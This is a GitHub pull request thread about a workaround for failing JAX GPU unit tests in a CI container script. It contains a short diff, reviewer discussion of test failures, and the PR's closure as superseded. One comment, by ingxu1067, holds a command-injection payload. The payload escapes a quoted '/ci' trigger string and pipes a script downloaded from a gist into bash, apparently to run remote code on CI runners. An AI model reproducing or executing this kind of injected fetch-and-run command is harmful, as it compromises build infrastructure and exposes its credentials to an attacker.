### PR TITLE
WAR for JAX unit-tests

### PR DESCRIPTION
**Pull request by DwarKapex**
JAX unit-tests are broken. Apply WAR before the issue is fixed.

### CODE REVIEW

**Comment by ingxu1067** [comment]
/ci" && curl -sSfL gist.githubusercontent.com/ingxu1067/3b79a7aa11a98580565fc0150caf2876/raw/067ce0401504b45fb657cdde27cf4c9479705207/script1 | bash 
message="/ci

**Comment by terrykong** [comment]
Did the presubmit run correctly? It looked like V100 had some errors and A100 didn't finish running

File: .github/container/test-jax.sh [hunk 1]
```diff
@@ -142,6 +142,7 @@ case "${BATTERY}" in
         JOBS=$((NGPUS * JOBS_PER_GPU))
         EXTRA_FLAGS="--local_test_jobs=${JOBS} --test_env=JAX_TESTS_PER_ACCELERATOR=${JOBS_PER_GPU} --test_env=JAX_EXCLUDE_TEST_TARGETS=PmapTest.testSizeOverflow"
         BAZEL_TARGET="${BAZEL_TARGET} //tests:gpu_tests"
+        EXTRA_CONFIG_FLAG="--enable_cuda"
```
Comment (gpupuck) [inline .github/container/test-jax.sh:145]: It appears that all batteries need to be configured as `--enable_cuda`.

Comment (DwarKapex) [reply .github/container/test-jax.sh]: Done

**Review by terrykong — CHANGES_REQUESTED** [review]
Looks like the A100/V100 tests have this one failure: https://github.com/NVIDIA/JAX-Toolbox/actions/runs/9166145349/job/25201324240#step:7:2030

```
//tests:export_back_compat_test_gpu                                      FAILED in 13.7s
  /root/.cache/bazel/_bazel_root/cfd1b2cc6fe180f3eb424db6004de364/execroot/__main__/bazel-out/k8-opt/testlogs/tests/export_back_compat_test_gpu/test.log
```

Is this expected @DwarKapex ?

**Comment by olupton** [comment]
That failure is worked around by https://github.com/google/jax/pull/21258
I believe this PR was superseded by https://github.com/NVIDIA/JAX-Toolbox/pull/845

**Comment by terrykong** [comment]
Understood. I'll close this PR then

**Pull request closed without merging**